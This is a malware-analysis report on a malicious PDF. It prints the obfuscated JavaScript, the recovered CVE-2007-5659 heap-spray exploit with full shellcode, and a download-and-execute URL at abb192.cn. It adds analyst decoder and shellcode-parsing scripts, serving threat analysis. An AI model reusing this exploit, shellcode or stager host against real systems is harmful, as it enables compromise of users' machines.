MALICIOUS
Risk Score: 308

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1204.002 Malicious File
The PDF carries a /JavaScript action whose /JS stream (object 13) is heavily obfuscated: split string literals, mangled identifiers, and a custom 6-bit XOR table decoder whose output is handed to eval(). The recovered stage reads app.viewerVersion and runs only on versions it treats as vulnerable (below 7.1, 8.0.x, and 8.1.0 to 8.1.1); it then heap-sprays %u-escaped shellcode behind a NOP sled in 48 blocks of 4 MiB so that 0x0c0c0c0c is expected to land in a sled, and triggers CVE-2007-5659 by passing a msg string of 0x0c0c code units, doubled until it exceeds 44,952 characters, to Collab.collectEmailInfo(). The shellcode holds the hardcoded second-stage URL http://abb192.cn/exp/load.php?id=66&spl=4 and is built to download and execute whatever that URL serves. No specific family could be identified because of the obfuscation. The T1059.001 (PowerShell) mapping above is not borne out by the recovered code: nothing in the script or the shellcode invokes PowerShell; what the evidence shows is client-side exploitation of the Reader JavaScript API followed by a download-and-execute stager.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (8)

- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE match: exact; rule CVE_2007_5659). PDF JavaScript calls Collab.collectEmailInfo(). CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by an overlong argument, or a heap-sprayed msg field, passed to Collab.collectEmailInfo(); it is one of a series of Acrobat JavaScript API exploits. Identified after JavaScript deobfuscation.
- JavaScript action (low; 3 related findings; rule PDF_JAVASCRIPT). The PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER). The PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behaviour. Matched line in script:
  function QZepbp5zLRk(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function ywF8Z7gX(EwA3GqJHA2){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(EwA3GqJHA2)"+";"+"}");eval("function iMZx3oySrVw(oBy0Yok3B5Z3Z){var yohHrQaNfH8O="+"0,UUM2jyOJvQ8tty=oBy0Yok3B5Z3Z.l"+"en"+"gth,ieE1cNZQ9bcCB=10"+"2"+"4,WxaGKb1IzJDQ,mJQV05,Rg8j8F='',eSWOEUyUoaV7=yohHrQaNfH8O,pJ1GQKgwTkgeR=yohHrQaNfH8O,mZ4iJVFh=yohHrQaNfH8O,UgEXGkdr …
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL). The decoded exploit shellcode contains a hardcoded http(s) URL, stored either as little-endian %uXXXX Unicode escapes or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds its second-stage fetch URL this way and retrieves it with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS). The PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY). Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers. In this sample the transform that fired is the custom 6-bit XOR table decoder (see generic_stage_recovery_000.js below).
- Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://abb192.cn/exp/load.php?id=66&spl=4 (referenced by PDF JavaScript)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x369 | 6528 bytes |

SHA-256: 3c093d93c14390fa64eb77f9dc6913bd2f402f4d8f929ddcf8788e777daeb203
Detection

- ClamAV: No threats found (a signature miss; the verdict rests on the heuristics above, not on AV)
- Obfuscation or payload: likely. The carved artifact contains 4 eval/decoder/string-building tokens; 158 of 226 identifiers look randomly generated (e.g. 'vNMQEracMh4P352J_YidTJHNvDerMOp5ow4K1rfs') and there are 2 string-concatenation chains, consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)

```javascript
function QZepbp5zLRk(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function ywF8Z7gX(EwA3GqJHA2){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(EwA3GqJHA2)"+";"+"}");eval("function iMZx3oySrVw(oBy0Yok3B5Z3Z){var yohHrQaNfH8O="+"0,UUM2jyOJvQ8tty=oBy0Yok3B5Z3Z.l"+"en"+"gth,ieE1cNZQ9bcCB=10"+"2"+"4,WxaGKb1IzJDQ,mJQV05,Rg8j8F='',eSWOEUyUoaV7=yohHrQaNfH8O,pJ1GQKgwTkgeR=yohHrQaNfH8O,mZ4iJVFh=yohHrQaNfH8O,UgEXGkdrZxrp=Ar"+"ra"+"y(63,2,41,50,33,5,62,31,35,46,0,0,0,0,0,0,4,61,56,45,3,18,22,20,34,19,28,29,10,51,24,9,17,16,32,37,7,26,60,49,39,0,48,0,0,0,0,1,0,52,54,12,36,53,47,30,11,25,40,55,14,38,42,6,58,43,13,8,27,59,23,15,57,21,44);f"+"o"+"r(mJQV05=M"+"at"+"h.c"+"ei"+"l(UUM2jyOJvQ8tty/"+"ieE1cNZQ9bcCB)"+";mJQV05>yohHrQaNfH8O;mJQV05-"+"-){fo"+"r(WxaGKb1IzJDQ=Ma"+"th.m"+"in(UUM2jyOJvQ8tty,ieE1cNZQ9bcCB);WxaGKb1IzJDQ>yohHrQaNfH8O;WxaGKb1IzJDQ-"+"-,UUM2jyOJvQ8tty-"+"-){mZ4iJVFh|"+"=(UgEXGkdrZxrp[oBy0Yok3B5Z3Z.cha"+"rCod"+"eAt(eSWOEUyUoaV7+"+"+)-48])<"+"<pJ1GQKgwTkgeR;if(pJ1GQKgwTkgeR){Rg8j8F+"+"=ywF8Z7gX"+"(65^mZ4iJVFh&"+"2"+"5"+"5);mZ4iJVFh>"+">="+"8;pJ1GQKgwTkgeR-"+"="+"2;}el"+"se{pJ1GQKgwTkgeR="+"6"+";}}"+"}return (Rg8j8F);}var QWKgG1=implode('',['4KDsM@oDeZ','H@k5__X@Dg4Wv','NfQH','r4_ZcMY1','l24m','g4K1rfs','ErjB3h4','yZs@Z1r2','P352J_YidTJHNvDer','MOC5blIsTcM','dR52@4L','2cTU42INbd1','L','CQEN2','P3','5','2J','_','YidT','JHNv','DerMO','fe1','Of','NE','r2zbJ','ACM@','3_McON','PLPjELM4','mldJPL','vYQ','ox_XsbeQKM','JENn','WvNd','JPLvY','Qox_Xsbe','QKMJHgV@o','Ovd','35','YdPgZO','HKrGkcX','@o74P3','5','2J','_Yi','dT','J','HNvD','erM','OfODr8sIrMR3hmdFJCCM','@','3_McO','NPLPjELMxbJ','j2','vNMQEracMh4P352J_YidTJHNvDerMOp5ow4K1rfs','Erj','B3h4y','Z','r','a_W@z','N8shdoU42I','Nk','Y3c4i3rYRMlMP','3','ozNXs','4WvNWSIJH','@XsWOEJHj','vNkY3c4e1','rBP','H1','eZQ','D','eYI','1x','NZL4Wv','NaV1O3s1','sW','QE','U8PoreOvK3','P','oreOv','K3Por','eOvK3PorWKY_DQor3OTKDQo','rkKXYB','Porx5kY','BP','or','x5','vJZ','Por@JRJ','3Por@cvK3Por@cZ','_YQor@','dvJaPo','r','TJY_1QorTJZ_','TQ','o','rxrRKTQor5J','QK@Qor@JY','_TQo','rkyT','_T','Qor@sTYTQorB','KZKePore','rk_3P','orB','KZKePo','rkPY_bPor@J','QJ','3Po','r@J','Y_DQork','yT_TQorDRv','J3Pork_vgbPor@YT','YZ','PorWi','vJ3Por','@JY','JZP','or@JY_TQorYYZKkPo','rDRT_DQorbi','vgbPorkPTJZP','or','WiT_ZPor@JY','J','T','Qor@','J','Y_TQorY','Y','ZKkPorDR','T','_bPor1','YQgbPor','Z5TKT','QorW','ik','J5Qor@JQJ','5Q','or@JY_TQorYYZKkPorDRT_3','PorW5','v','g','bPorWKZJZ','Po','rWivgTQo','r@J','RJDQor@','JY','_TQ','or','YYZKkPorDRk_TQorM','PQgbPo','r','W_Y','g','kPorWiTKbP','o','r@JZJ','BPor@JY_TQorYY','Z','KkPorY','JZ_D','Qo','r','5N','kKTQorB_ZJ1QorkKTJaPorTNTYYQo','r','@dvJkP','or@','JY_@Qor','DYT_T','QorB_','ZKk','Por','kyXY','DQor@cYYYQor@QQgaPorkykYkPo','rTNkYYQor','W','i','kYB','Por@J','ZK','eP','o','r@J','Y','_TQor','xik','YTQorTQv_BPorBKR','YW','Por','bSvJbPor@JY_TQorkKT_TQorTsTYYQor','M_ZK','ePorMKZK1','Qo','rkKkYTQor1JYYYQo','rZ5vgbPor','@JY_','TQ','o','rDJY_TQorY','YZKeP','or','x','P','k_DQorD','JT_5Q','or','DYZKePorW','ik_bPor@JQg','@Qor@','JY_T','QorYYY_1','QorM','SXYTQo','rDs','T_TQor1YTg','ZP','orM','SvgYQor@','cYY','TQorx_YgbP','or@','JY_TQorB','_YJ','WPork','yX','YTQo','r@sT','YYQ','or@QQgaP','orkykYkPorTNkYYQorYJQJbPor@JY_TQor','xPT_TQorDNT_xPorYY','Y_1Q','or5','s','RY','DQorDsRJePorZ5kY','1Qor','1JY','gYQor','DsZYT','Qo','rYY','Z','KePorxPk_3PorDJT_','YQorD','YZ','KePo','r','Wik_bPor@JR','Y1','Qor@JY_TQor@JQ','gaPo','rB_YJWPor','kyXY','TQ','or@NT','YYQor@GQgaPorkykYk','Po','r','TNkYY','Q','orTJQJ','bPor@JY','_TQo','rxPT_TQorky','TJWP','orTJY','YYQo','r@QQ','gaPork','ykYkPorTN','kY','YQo','r@JQJbPor@','JY_T','Qo','rYQ','Y_TQo','rDGZYeP','orWPY_1QorWP','Y','_','1QorWPY_1','Qo','rWPY_1','QorWOkK','1QorDQT_DQorkykY1','QorWyRJaPor','DGYJxPorW','KY','JWPorkykYYQ','orkyvJ3','Por','@NTgMPorD','ckKePorDRT_3P','orBOZKePork','yv_3PorTYTgD','Qor@sYg','bPor','DRTJ1QorB4kKePor@sR','Y','T','Qor5sYJ1','QorYJkJkPor','erT','Y@Q','orMOY_1Qor5s','ZYBPor@@T','JB','Po','rTJYK','ZPorZyQ','_','aPor@N','TgDQ','orM_kJ@Q','or@sY_MPorYJ','YJ5QorZPQ','JePorZ_v_','ePorB_ZY','ZPorDQvJY','Q','orWykKePor','D','Q','kKePo','r@sRY','DQorx4XJMPor','@s','kKePor','kyTYeP','or','Ts','kYaP','or3','rT','_1Qor@cZKe','Por@','sZKePorD','Yk','J','YQorMyZYMPor@JY_b','PorZr','QJb','PorZ5TJZ','PorDYY','JWPorY','sk','Y5','QorY','@TYMPor@JYYZPorbykKxPorb5XKe','PorMKRJYQ','or','k','_kJTQorkrkK','MPo','r34XJZ','Por','MPRJMPo','rkPZ','K3PorkPkJ','TQorb5XK','xPor','kO','ZJTQ','ork_','kKTQo','rMPZKeP','orkSXKWPor3KRKWPo','r','kykKB','Por3','KXJ','5Q','orMKXJkPorb5XK3Por3yZK1QorW5XJ','eroUp5brR','cINqGWsi','JQLYsDOar','k1lQ','INV5FJxGvJW','5vJW2vN','kY3c4KZhv','svh','zZ1','5','ZSv','oO','@o74e','1rBPH1e','ZQDeYI1','xNZLfe1O','f','NEr2@bU4','rXg4KDsM@blI','sTcMd','R52@','4L','2cvNV5bL','ycEoTd1Y3Q1KM','CRDa','@ot','4Sb_fJ4','JC','Z','1','hG','Yv','gi','d','RUWS8','Jx','4mg4K','DsM@oOvd35YdPg','ZOHKrGkcX@o7','4PMh','ds8','sR@DO2roiaRvJ','B5','TiaRvJB5kNj','2vNdJ','PL','vYQox_XsbeQKMJENV','5F_8QYh','adoOvd','35YdPgZOHKrGkcXaF','Nuc4JZc','I1FdE@n','d','3Jj2vN','kY3','c4_','_LeP','W','YXsT@cs','QNV','5FUm','J','DYB','zM','Jdz_hbOENz5','FJx','GvJW5vJW4m','tqGWs','iJQ','L','Y','sDOark1lQ8g','4KHhM@FUkY3c4SIDeiYlBc_7W2v','lrG','X_BRM@A__LePWYX','sT@csR','gx','aQKo','R','D','l','IjmU','j5m','l4WQrzs','WK','P','QZO','WR','Xox','aQKo','RDlIZPNV5','oOvd35YdPg','ZO','HKrGkcX@mU4e1r','BPH1eZQD','eY','I1xN','ZL','p5o','w4WINXQMhH','GDL9VENcNR1r','JEUj','5ml4KDsM@ocQs','voy@o74_E','cWV','brj','QH','rdcM5','dc8cjB3','hf','y8hEGMcjVHO2','4m','g4_D@3SP','54WvN','ZY4J','iG','W','t','MQEcCYHsddmtKGR','tm','ab','N84mg4KDs','M@F5TR','R1w','YMsy@o7','4A1Ob@oYMcDsBdocQsvoyVms2Y3','c','YGIUW4','FtZ','Y4JiG','WtHd1sMYQr2_TUC_D@3S','P','5fOELRc','DY','edb','Jj4mg','4','43','O4','SFUyJY1','LVY','c','8G4','oWW','PNV','WvNx5b','iX','5FU2yW_sj','ZDZcE5UYT','T4','W','T74','_vNXKFNyJY','1','LVYc8','G4oMW','P','NA5bJj5F','wA','@F5TRR1wYMsy@o7','4A1Ob@oYMcDsBdocQsvoyVms2Y3','c','YGIUW4','FtZ','Y4JiG','WtHd1sMYQr2_TUC_D@3S','P','5fOELRc','DY','edb','Jj4mg','4','43','O4','SFUyJY1','LVY','c','8G4','oWW','PNV','WvNx5b','iX','5FU2yW_sj','ZDZcE5UYT','T4','W','T74','_vNXKFNyJY','1','LVYc8','G4oMW','P','NA5bJj5F','wA','@F5TRR1wYMsyj_JJ@F74_TUj5FwA','@','FUyJY1LVYc8G4oWWPNVWvNb5biX5F5TRR','1wYMsyj_JJ','@F74','_TU4eI','w4S','F5','TR','R1','wYM','syjPJJ@','F7','4iTUj','5ml4yZra_','W@zN8','shdoUp5','brRcI','N','@dW','cGsQrkzPNV','5orfQHcHYEcddbNdPIJH@Xs','dPI','JH@Xs84mg4iILj','a1O2PQoM','Q4','YeJM','ofe1OfN','Er','2','@F74yvK','BPkJ','j5o_icD','51GMr','t@mUV5','o_','icD51','G','MrtjvN','ed1L3Vms9a','EhRcH@eB3','c','d@o74ORhCa1s8Vms9aEhds','E','r@Z1s','ja11fJHh228ca','c3Lu5b','N8eo','h3N3g4PQoMQ4','YeJMoVRm','g4WI','NV@oDo','j','QD','Xd','oUp_']);");eval(iMZx3oySrVw(QWKgG1));}
```
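As an added example (not the analyzer's code and not part of the sample), here is the decoder that the carved script above assembles through eval() (iMZx3oySrVw), rewritten so it can be read, together with the inverse encoder and a small stage-recovery helper so the whole chain can be exercised on constructed input. The lookup table and the XOR key 0x41 are taken from the carved script as shown; the ALPHABET string, the encoder, recoverStage, buildConstructedSample and the stand-in stage text are my own assumptions for the demonstration. One known answer is checked against the real blob: its first two pieces, '4KDsM@oDeZ' and 'H@k5__X@Dg4Wv', decode to the opening of generic_stage_recovery_000.js (including a leading space that the preview further down does not show).

```javascript
// Added example: readable reimplementation of the 6-bit XOR table decoder
// hidden in javascript_obj0013_001.js, plus an encoder and a recovery helper.

// The lookup table exactly as the carved script defines it: index is
// (charCode - 48), value is the 6-bit group that character contributes.
const SIXBIT_TABLE = [
  63, 2, 41, 50, 33, 5, 62, 31, 35, 46,                       // '0'..'9'
  0, 0, 0, 0, 0, 0,                                            // ':'..'?'  unused
  4,                                                           // '@'
  61, 56, 45, 3, 18, 22, 20, 34, 19, 28, 29, 10, 51,           // 'A'..'M'
  24, 9, 17, 16, 32, 37, 7, 26, 60, 49, 39, 0, 48,             // 'N'..'Z'
  0, 0, 0, 0,                                                  // '['..'^'  unused
  1,                                                           // '_'
  0,                                                           // '`'       unused
  52, 54, 12, 36, 53, 47, 30, 11, 25, 40, 55, 14, 38,          // 'a'..'m'
  42, 6, 58, 43, 13, 8, 27, 59, 23, 15, 57, 21, 44,            // 'n'..'z'
];

// The 64 characters the encoded blob is made of (assumption: a base64-like
// alphabet with '@' and '_' in place of '+' and '/'); over these characters
// the table is a permutation of 0..63, so it can be inverted.
const ALPHABET = '0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz';
const INVERSE = [];
for (const ch of ALPHABET) INVERSE[SIXBIT_TABLE[ch.charCodeAt(0) - 48]] = ch;

// Same arithmetic as the carved decoder, minus the name mangling and the
// 1024-character outer loop (which only chunks the same linear scan): four
// characters pack little-endian into three bytes and every byte is XORed
// with 0x41 ('A') on the way out.
function decodeSixbitXor(text, key = 0x41) {
  let acc = 0, shift = 0, out = '';
  for (let i = 0; i < text.length; i++) {
    const idx = text.charCodeAt(i) - 48;
    if (idx < 0 || idx >= SIXBIT_TABLE.length) {
      throw new Error(`character ${JSON.stringify(text[i])} at ${i} is outside the decoder's alphabet`);
    }
    acc |= SIXBIT_TABLE[idx] << shift;
    if (shift) {
      out += String.fromCharCode(key ^ (acc & 0xff));
      acc >>= 8;
      shift -= 2;
    } else {
      shift = 6;
    }
  }
  return out;
}

// Inverse of the above; only needed to build test input (the sample ships the
// encoded blob, not an encoder).
function encodeSixbitXor(text, key = 0x41) {
  let acc = 0, bits = 0, out = '';
  for (let i = 0; i < text.length; i++) {
    acc |= ((text.charCodeAt(i) & 0xff) ^ key) << bits;
    bits += 8;
    while (bits >= 6) {
      out += INVERSE[acc & 0x3f];
      acc >>= 6;
      bits -= 6;
    }
  }
  if (bits > 0) out += INVERSE[acc & 0x3f];
  return out;
}

// The carved script hides the blob as implode('', ['piece', 'piece', ...]),
// where implode is just Array.join. Pull the pieces out of a script source,
// join them and decode; null when the pattern is absent.
function recoverStage(source) {
  const m = /implode\(\s*''\s*,\s*\[([^\]]*)\]\s*\)/.exec(source);
  if (!m) return null;
  const pieces = Array.from(m[1].matchAll(/'([^']*)'/g), x => x[1]);
  return decodeSixbitXor(pieces.join(''));
}

// Constructed stand-in for the carved script: a harmless stage, encoded and
// split into uneven pieces the way the sample does it.
function buildConstructedSample(stage) {
  const encoded = encodeSixbitXor(stage);
  const pieces = [];
  for (let i = 0, n = 1; i < encoded.length; i += n, n = 1 + (i % 7)) {
    pieces.push(`'${encoded.slice(i, i + n)}'`);
  }
  return `function s(){var k=implode('',[${pieces.join(',')}]);eval(d(k));}`;
}

const CONSTRUCTED_STAGE = 'var u = "http://example.invalid/stage2"; app.viewerVersion;';
const sample = buildConstructedSample(CONSTRUCTED_STAGE);
console.log(sample);
console.log(recoverStage(sample));
// Known answer from the real blob: its first two pieces decode to the start of
// generic_stage_recovery_000.js, " var MtmS6PEfp9 =".
console.log(JSON.stringify(decodeSixbitXor('4KDsM@oDeZH@k5__X@Dg4Wv')));
```

To run recoverStage against the real artifact, feed it the full text of javascript_obj0013_001.js; the regex only needs the implode('', [...]) call, so the surrounding eval() wrappers and mangled names can stay as they are. The table comes out to 75 entries because the sample indexes it by charCode minus 48 and simply zero-fills the punctuation between '9' and '@' and between 'Z' and 'a'.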
| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (sixbit-xor-table) from JavaScript object 13 at offset 0x369 | 2605 bytes |

SHA-256: 03454a226313b91441f6afe1d9ff00ba80d103c19629dffa53643977a2c4ae51
Detection

- ClamAV: No threats found (a signature miss even on the deobfuscated stage)
- Obfuscation or payload: likely. The carved artifact contains 3 eval/decoder/string-building tokens.
Preview script (first 1,000 lines of the extracted script)

```javascript
var MtmS6PEfp9 = new Array();
function DbEmu(eVhVAX81c7L4rf, zR3qrHWhPkh2) {
  while (eVhVAX81c7L4rf.length*2<zR3qrHWhPkh2){eVhVAX81c7L4rf += eVhVAX81c7L4rf;}
  eVhVAX81c7L4rf = eVhVAX81c7L4rf.substring(0,zR3qrHWhPkh2/2);
  return eVhVAX81c7L4rf;
}
function Dv5QRmwcJ() {
  var gvAyz2eZm7c = 0x0c0c0c0c;
  var lu9eKtMLtqHxGj = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u363D%u2636%u7073%u3D6C%u0034");
  var jTbXFhAse52JOu = 0x400000;
  var FnV3lmmU18XH = lu9eKtMLtqHxGj.length * 2;
  var zR3qrHWhPkh2 = jTbXFhAse52JOu - (FnV3lmmU18XH+0x38);
  var eVhVAX81c7L4rf = unescape("%u9090%u9090");
  eVhVAX81c7L4rf = DbEmu(eVhVAX81c7L4rf, zR3qrHWhPkh2);
  var Qi4UBf3QMC = (gvAyz2eZm7c - 0x400000)/jTbXFhAse52JOu;
  for (var xL4GyyR=0;xL4GyyR<Qi4UBf3QMC;xL4GyyR++) { MtmS6PEfp9[xL4GyyR] = eVhVAX81c7L4rf + lu9eKtMLtqHxGj; }
}
function MGKLf() {
  var qQ3XT = app.viewerVersion.toString();
  qQ3XT = qQ3XT.replace(/\D/g,"");
  var TFIKNqbT = new Array(qQ3XT.charAt(0),qQ3XT.charAt(1),qQ3XT.charAt(2));
  if ((TFIKNqbT[0] == 8 && ((TFIKNqbT[1] == 1 && TFIKNqbT[2] < 2) || TFIKNqbT[1] < 1)) || (TFIKNqbT[0] == 7 && TFIKNqbT[1] < 1) || (TFIKNqbT[0] < 7)) {
    Dv5QRmwcJ();
    var EXrUCtvZ = unescape("%u0c0c%u0c0c");
    while(EXrUCtvZ.length < 44952) EXrUCtvZ += EXrUCtvZ;
    this.collabStore = Collab.collectEmailInfo({subj: "",msg: EXrUCtvZ});
  }
}
MGKLf();
```
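As an added example (not the analyzer's code and not part of the sample), this is the shellcode handling a practitioner would do next on generic_stage_recovery_000.js: undo the %uXXXX escapes into the bytes the spray puts in memory, read the XOR key and length out of the shellcode's own decoder stub, and pull out the plaintext URL that PDF_JS_SHELLCODE_DOWNLOAD_URL reports. The two constructed inputs are the first 27 code units and the URL-bearing tail of the unescape() string shown above; every function name here is my own. The stub parsing is my reading of the first 28 bytes (the page itself does not describe this inner XOR layer): a jmp/call/pop sequence that XORs 0x180 bytes with 0xEF, which is why the escapes are so full of EF. What the decoded body does beyond its opening instructions is not examined.

```javascript
// Added example: %uXXXX shellcode to bytes, XOR-stub recovery, URL extraction.

// unescape() turns %uXXXX into one UTF-16 code unit; once sprayed, the string's
// memory image is the little-endian bytes of each unit, so %u7468 is "ht".
function unicodeEscapesToBytes(escaped) {
  const out = [];
  for (let i = 0; i < escaped.length; ) {
    const u4 = escaped.slice(i + 2, i + 6), h2 = escaped.slice(i + 1, i + 3);
    if (escaped[i] === '%' && escaped[i + 1] === 'u' && /^[0-9a-f]{4}$/i.test(u4)) {
      const unit = parseInt(u4, 16);
      out.push(unit & 0xff, unit >> 8);
      i += 6;
    } else if (escaped[i] === '%' && /^[0-9a-f]{2}$/i.test(h2)) {
      out.push(parseInt(h2, 16));
      i += 3;
    } else {                                   // literal character, kept as unescape() keeps it
      out.push(escaped.charCodeAt(i) & 0xff);
      i += 1;
    }
  }
  return Uint8Array.from(out);
}

// The sample's prologue is the textbook x86 shape
//   jmp short L1 / L0: pop ebx / xor ecx,ecx / mov cx,LEN / L2: xor byte [ebx],KEY
//   / inc ebx / loop L2 / jmp payload / L1: call L0 / payload: ...
// so LEN and KEY are read straight out of the stub and the payload starts at
// the call's return address. Returns null when that shape is not present.
function parseXorStub(bytes) {
  for (let i = 0; i + 7 <= bytes.length; i++) {
    if (bytes[i] === 0x66 && bytes[i + 1] === 0xb9 &&            // mov cx, imm16
        bytes[i + 4] === 0x80 && bytes[i + 5] === 0x33) {         // xor byte [ebx], imm8
      const length = bytes[i + 2] | (bytes[i + 3] << 8);
      const key = bytes[i + 6];
      for (let j = i + 7; j + 5 <= bytes.length; j++) {
        if (bytes[j] !== 0xe8) continue;                           // call rel32
        const rel = (bytes[j + 1] | bytes[j + 2] << 8 | bytes[j + 3] << 16 | bytes[j + 4] << 24) | 0;
        if (rel < 0 && j + 5 + rel >= 0 && bytes[j + 5 + rel] === 0x5b) {   // lands on pop ebx
          return { key, length, start: j + 5 };
        }
      }
    }
  }
  return null;
}

// Apply the stub's XOR to whatever part of the payload is actually present.
function decodeXorLayer(bytes) {
  const stub = parseXorStub(bytes);
  if (!stub) return null;
  const end = Math.min(bytes.length, stub.start + stub.length);
  const decoded = bytes.slice(stub.start, end).map(b => b ^ stub.key);
  return { ...stub, truncated: end < stub.start + stub.length, decoded };
}

// Printable-ASCII runs, i.e. what `strings` would print.
function asciiStrings(bytes, minLen = 6) {
  const found = [];
  let run = '';
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) { run += String.fromCharCode(b); continue; }
    if (run.length >= minLen) found.push(run);
    run = '';
  }
  if (run.length >= minLen) found.push(run);
  return found;
}

// URLs stored in the clear after the XORed body (the downloader's NUL-terminated target).
function shellcodeUrls(bytes) {
  return asciiStrings(bytes).flatMap(s => s.match(/https?:\/\/[^\s"'<>]+/g) || []);
}

function analyse(escaped) {
  const bytes = unicodeEscapesToBytes(escaped);
  return { bytes, layer: decodeXorLayer(bytes), urls: shellcodeUrls(bytes) };
}

// Constructed inputs: the first 27 code units and the URL-bearing tail of the
// unescape() string in the preview above. The full blob is in the carved file.
const SHELLCODE_HEAD = '%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903';
const SHELLCODE_TAIL = '%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u363D%u2636%u7073%u3D6C%u0034';

const hex = a => Array.from(a, b => b.toString(16).padStart(2, '0')).join(' ');
const head = analyse(SHELLCODE_HEAD);
console.log(`xor key 0x${head.layer.key.toString(16)}, ${head.layer.length} bytes from offset ${head.layer.start}` +
            (head.layer.truncated ? ' (input truncated)' : ''));
// First decoded bytes: 90 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad, i.e. nop;
// mov eax,fs:[30h]; mov eax,[eax+0Ch]; mov esi,[eax+1Ch]; lodsd: the usual
// PEB walk used to locate kernel32 before resolving imports.
console.log('decoded head:', hex(head.layer.decoded));
console.log('urls:', analyse(SHELLCODE_TAIL).urls);
```

Because only the head is embedded, the layer is reported as truncated; paste the complete unescape() argument from the carved file in place of SHELLCODE_HEAD to decode all 0x180 bytes and run asciiStrings over the result. The URL is found without any decoding because the stager leaves it in the clear after the XORed body, which is exactly the trait the PDF_JS_SHELLCODE_DOWNLOAD_URL rule keys on.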